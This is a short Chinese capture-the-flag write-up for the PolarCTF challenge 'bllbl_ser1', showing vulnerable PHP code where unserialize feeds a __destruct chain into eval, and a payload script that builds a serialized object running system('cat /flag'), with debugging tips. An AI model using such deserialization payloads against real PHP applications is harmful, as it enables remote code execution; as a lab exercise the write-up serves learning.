【PolarCTF】bllbl_ser1

很基础的一道题

复制代码
class bllbl{
    public $qiang;//我的强
    function  __destruct(){
        $this->bllliang();
    }
    function bllliang(){
        $this->qiang->close();
    }
    }
    class bllnbnl{
     public $er;//我的儿
    function close(){
        eval($this->er);
    }
    }
    if(isset($_GET['blljl'])){
        $user_data=unserialize($_GET['blljl']);
    }

payload如下

复制代码
<?php

class bllbl{
    public $qiang;//我的强
    
    }
class bllnbnl{
    public $er;    }
    
$a = new bllbl();
$b = new bllnbnl();
$a->qiang = $b;
$b->er = "system('cat /flag');";

echo urlencode(serialize($a));

?>

这道题的一些知识点

代码可以只打我们需要的部分

从payload可以看到,我们只需要构造我们需要的部分,class的其他部分可以删除

复制代码
<?php

class bllbl{
    public $qiang;//我的强
    
    }
class bllnbnl{
    public $er;    }

通过eval运行的时候代码后面要加;

在做的过程中犯了一个小毛病,就是system后面没有加; 导致payload一直没打成功

复制代码
$b->er = "system('cat /flag');";
相关推荐
白猫不黑8 小时前
大学网安方向学习路线:零基础与有基础的学习顺序整理
学习·web安全·计算机·网络安全·信息安全·编程·src漏洞
数据知道15 小时前
哈希与密码存储——bcrypt、Argon2、盐值与彩虹表
网络·算法·安全·网络安全·密码学·哈希算法
sbjdhjd15 小时前
从 assert 动态调用报错到临时文件链路:PHP 5.6 与 7.3 授权靶场中的短 payload 复盘 | (17字符绕过)
安全·网络安全·数据挖掘·开源·云计算·php·字符绕过
sbjdhjd15 小时前
从 7 字符文件名拼接到二维数组取值:PHP 无参函数限制下的受控靶场复盘 | (7字符绕过)
网络·nginx·安全·网络安全·云计算·php·apache
一条泥憨鱼18 小时前
【从0开始学习计算机网络】| TIME_WAIT 为什么是 2MSL,CLOSE_WAIT / TIME_WAIT 堆积怎么排查
服务器·开发语言·网络·计算机网络·网络安全
Best-Wishes18 小时前
sqlmap安全测试使用指南
网络安全
Bruce_Liuxiaowei1 天前
从两个中危漏洞读懂 CVSS 评分体系:向量拆解、数学计算与实战观察
安全·网络安全·漏洞评级
我的小卷呀2 天前
Linux ip 命令底层逻辑与实战指南
linux·运维·c语言·网络协议·tcp/ip·网络安全
泛联新安2 天前
“天神”空降:泛联新安受邀参加第八届“纵横”网络空间创新论坛
网络安全·自动化·代码规范·漏洞挖掘·代码安全·代码漏洞扫描·ai+可信开发
HackTwoHub2 天前
AI自动化信息收集赋能渗透测试!集成多款主流扫描工具,多维智能评分,精准锁定高危资产
运维·人工智能·安全·web安全·网络安全·自动化·系统安全